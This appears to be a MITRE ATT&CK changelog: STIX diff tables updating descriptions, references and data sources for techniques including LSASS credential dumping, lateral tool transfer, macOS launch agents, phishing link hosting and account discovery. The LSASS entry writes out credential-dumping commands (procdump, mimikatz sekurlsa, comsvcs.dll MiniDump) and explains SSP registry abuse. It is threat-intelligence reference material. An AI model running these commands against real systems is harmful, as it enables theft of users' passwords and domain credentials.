| description | Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
|
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
|
| external_references[1]['source_name'] | Volexity Exchange Marauder March 2021 | Medium Detecting Attempts to Steal Passwords from Memory |
| external_references[1]['description'] | Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. | French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019. |
| external_references[1]['url'] | https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ | https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea |
| external_references[2]['source_name'] | Symantec Attacks Against Government Sector | Graeber 2014 |
| external_references[2]['description'] | Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021. | Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017. |
| external_references[2]['url'] | https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf | http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html |
| external_references[3]['source_name'] | Graeber 2014 | Volexity Exchange Marauder March 2021 |
| external_references[3]['description'] | Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017. | Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. |
| external_references[3]['url'] | http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html | https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ |
| external_references[4]['source_name'] | TechNet Blogs Credential Protection | Powersploit |
| external_references[4]['description'] | Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018. | PowerSploit. (n.d.). Retrieved December 4, 2014. |
| external_references[4]['url'] | https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/ | https://github.com/mattifestation/PowerSploit |
| external_references[5]['source_name'] | Medium Detecting Attempts to Steal Passwords from Memory | Symantec Attacks Against Government Sector |
| external_references[5]['description'] | French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019. | Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021. |
| external_references[5]['url'] | https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea | https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf |
| external_references[6]['source_name'] | Powersploit | TechNet Blogs Credential Protection |
| external_references[6]['description'] | PowerSploit. (n.d.). Retrieved December 4, 2014. | Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018. |
| external_references[6]['url'] | https://github.com/mattifestation/PowerSploit | https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/ |
| x_mitre_data_sources[2] | Process: Process Access | Process: OS API Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Access |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. | Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019) Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-28 21:17:42.490000+00:00 | 2022-04-19 15:34:49.016000+00:00 |
| description | Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. | Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019) Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). |
| x_mitre_data_sources[0] | Network Share: Network Share Access | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | File: File Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | File: File Metadata |
| x_mitre_data_sources[6] | File: File Creation | Network Share: Network Share Access |
| x_mitre_data_sources[7] | File: File Metadata | Network Traffic: Network Traffic Flow |
| x_mitre_detection | Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts. | Monitor for file creation and files transferred within a network using protocols such as SMB or FTP. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts. |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Unit42 LockerGoga 2019', 'description': 'Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.', 'url': 'https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/'} |
| Description |
|---|
Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.
Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.
Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Antonio Piazza, @antman1p'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-03 20:11:51.687000+00:00 | 2022-04-21 16:13:00.598000+00:00 |
| external_references[2]['source_name'] | OSX Keydnap malware | Sofacy Komplex Trojan |
| external_references[2]['description'] | Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. | Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. |
| external_references[2]['url'] | https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ | https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ |
| external_references[3]['source_name'] | Antiquated Mac Malware | OceanLotus for OS X |
| external_references[3]['description'] | Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017. | Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. |
| external_references[3]['url'] | https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ | https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update |
| external_references[4]['source_name'] | OSX.Dok Malware | OSX Keydnap malware |
| external_references[4]['description'] | Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017. | Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. |
| external_references[4]['url'] | https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ | https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ |
| external_references[5]['source_name'] | Sofacy Komplex Trojan | Methods of Mac Malware Persistence |
| external_references[5]['description'] | Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. |
| external_references[5]['url'] | https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf |
| external_references[6]['source_name'] | Methods of Mac Malware Persistence | OSX Malware Detection |
| external_references[6]['description'] | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. |
| external_references[6]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf |
| external_references[7]['source_name'] | OSX Malware Detection | Antiquated Mac Malware |
| external_references[7]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017. |
| external_references[7]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ |
| external_references[8]['source_name'] | OceanLotus for OS X | OSX.Dok Malware |
| external_references[8]['description'] | Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. | Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017. |
| external_references[8]['url'] | https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update | https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ |
| x_mitre_data_sources[2] | File: File Modification | Service: Service Creation |
| x_mitre_version | 1.3 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Service: Service Creation |
| Old Description | New Description |
|---|---|
| Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. | Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:28:41.565000+00:00 | 2022-10-20 20:15:57.855000+00:00 |
| description | Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. | Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) |
| external_references[1]['source_name'] | Malwarebytes Silent Librarian October 2020 | Netskope GCP Redirection |
| external_references[1]['description'] | Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021. | Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022. |
| external_references[1]['url'] | https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ | https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection |
| external_references[2]['source_name'] | Proofpoint TA407 September 2019 | Netskope Cloud Phishing |
| external_references[2]['description'] | Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021. | Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022. |
| external_references[2]['url'] | https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian | https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Malwarebytes Silent Librarian October 2020', 'description': 'Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.', 'url': 'https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/'} | |
| external_references | {'source_name': 'Intezer App Service Phishing', 'description': 'Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.', 'url': 'https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/'} | |
| external_references | {'source_name': 'Proofpoint TA407 September 2019', 'description': 'Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian'} |
| Description |
|---|
Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-28 18:05:24.567000+00:00 | 2022-08-25 13:04:39.404000+00:00 |
| x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Miriam Wiesner, @miriamxyra, Microsoft Security | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_data_sources | Group: Group Enumeration |
| Old Description | New Description |
|---|---|
| Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. | Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Massimiliano Romano, BT Security'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-05-26 19:23:54.854000+00:00 | 2022-04-21 16:07:10.829000+00:00 |
| description | Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. | Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021) |
| x_mitre_detection | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Prevailion DarkWatchman 2021', 'description': 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.', 'url': 'https://www.prevailion.com/darkwatchman-new-fileless-techniques/'} | |
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| Description |
|---|
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
